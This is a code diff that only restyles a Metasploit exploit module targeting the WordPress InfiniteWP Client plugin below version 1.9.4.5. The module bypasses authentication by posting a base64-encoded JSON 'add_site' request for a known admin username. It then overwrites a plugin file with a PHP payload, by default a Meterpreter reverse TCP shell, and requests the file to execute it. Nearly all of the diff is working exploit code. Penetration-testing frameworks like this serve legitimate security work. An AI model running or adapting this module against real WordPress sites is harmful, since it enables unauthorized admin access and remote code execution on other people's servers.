@@ -11,50 +11,53 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
-      'Description'    => %q{
-        This module exploits an authentication bypass in the WordPress
-        InfiniteWP Client plugin to log in as an administrator and execute
-        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress InfiniteWP Client Authentication Bypass',
+        'Description' => %q{
+          This module exploits an authentication bypass in the WordPress
+          InfiniteWP Client plugin to log in as an administrator and execute
+          arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.
 
-        The module will attempt to retrieve the original PLUGIN_FILE contents
-        and restore them after payload execution. If VerifyContents is set,
-        which is the default setting, the module will check to see if the
-        restored contents match the original.
+          The module will attempt to retrieve the original PLUGIN_FILE contents
+          and restore them after payload execution. If VerifyContents is set,
+          which is the default setting, the module will check to see if the
+          restored contents match the original.
 
-        Note that a valid administrator username is required for this module.
+          Note that a valid administrator username is required for this module.
 
-        WordPress >= 4.9 is currently not supported due to a breaking WordPress
-        API change. Tested against 4.8.3.
-      },
-      'Author'         => [
-        'WebARX', # Discovery
-        'wvu'     # Module
-      ],
-      'References'     => [
-        ['WPVDB', '10011'],
-        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
-        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
-        ['URL', 'http://web.archive.org/web/20250117161327/https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
-      ],
-      'DisclosureDate' => '2020-01-14',
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'php',
-      'Arch'           => ARCH_PHP,
-      'Privileged'     => false,
-      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'},
-      'Notes'          => {
-        'Stability'    => [CRASH_SAFE],
-        'Reliability'  => [REPEATABLE_SESSION],
-        'SideEffects'  => [IOC_IN_LOGS, CONFIG_CHANGES]
-      }
-    ))
+          WordPress >= 4.9 is currently not supported due to a breaking WordPress
+          API change. Tested against 4.8.3.
+        },
+        'Author' => [
+          'WebARX', # Discovery
+          'wvu'     # Module
+        ],
+        'References' => [
+          ['WPVDB', '10011'],
+          ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
+          ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
+          ['URL', 'http://web.archive.org/web/20250117161327/https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
+        ],
+        'DisclosureDate' => '2020-01-14',
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Privileged' => false,
+        'Targets' => [['InfiniteWP Client < 1.9.4.5', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
 
     register_options([
-      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
+      OptString.new('USERNAME', [true, 'WordPress username', 'admin']),
       OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
     ])
 
@@ -101,13 +104,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def auth_bypass
     json = {
       'iwp_action' => %w[add_site readd_site].sample,
-      'params'     => {'username' => username}
+      'params' => { 'username' => username }
     }.to_json
 
     res = send_request_cgi(
       'method' => 'POST',
-      'uri'    => wordpress_url_backend,
-      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
+      'uri' => wordpress_url_backend,
+      'data' => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
     )
 
     unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
@@ -152,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Requesting payload at #{plugin_uri}")
     send_request_cgi({
       'method' => 'GET',
-      'uri'    => plugin_uri
+      'uri' => plugin_uri
     }, 0)
 
     restore_contents(contents)
